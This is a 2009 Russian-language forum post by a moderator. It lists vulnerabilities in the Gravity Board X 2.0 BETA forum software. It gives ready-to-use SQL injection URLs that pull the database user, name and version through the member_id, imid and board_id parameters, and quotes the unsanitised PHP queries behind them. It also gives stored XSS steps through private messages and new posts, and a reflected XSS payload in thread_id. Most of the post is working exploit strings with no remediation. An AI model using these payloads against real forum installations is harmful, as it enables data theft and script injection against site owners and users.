10.11.2009, 07:20
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Gravity Board X
Название: Gravity Board X
Офф. сайт: http://www.gravityboardx.com
Версия: 2.0 BETA (Public Release 3)
SQL Иньекция.
/index.php?action=viewprofile&member_id=-2'+union+select+concat_ws(0x3a,user(),database(),v ersion())+--+
Уязвимый код:
PHP код:
$miquery = mysql_query("SELECT * FROM " . $prefix . "members WHERE memberid = '{$_GET['member_id']}'") OR DIE("Gravity Board X was unable get the member data requested from the members database: " . mysql_error());
index.php?action=viewpm&imid=-1'+union+select+concat_ws(0x3a,user(),database(),v ersion()),2,3,4,5,6,7,8,9,10+--+
Уязвимый код:
PHP код:
$imquery = mysql_query("SELECT * FROM " . $prefix . "ims WHERE imid='{$_GET['imid']}' AND imto='{$_SESSION['memberid']}'", $connection) OR DIE("Gravity Board X was unable to retrieve your personal message from the database: " . mysql_error());
/index.php?action=viewboard&board_id=-2'+union+select+1,concat_ws(0x3a,user(),database() ,version()),3+--+
Активная XSS.
/index.php?action=newpm
В поле Message(Сообщение).
<script>alert();</script>
И отправляем.
/index.php?action=postnew&board_id=[Номер категории]
Имя: Bla
Message:
<script>alert();</script>
Пассивная XSS
/index.php?action=viewthread&thread_id="><script>al ert()</script>
|
|
|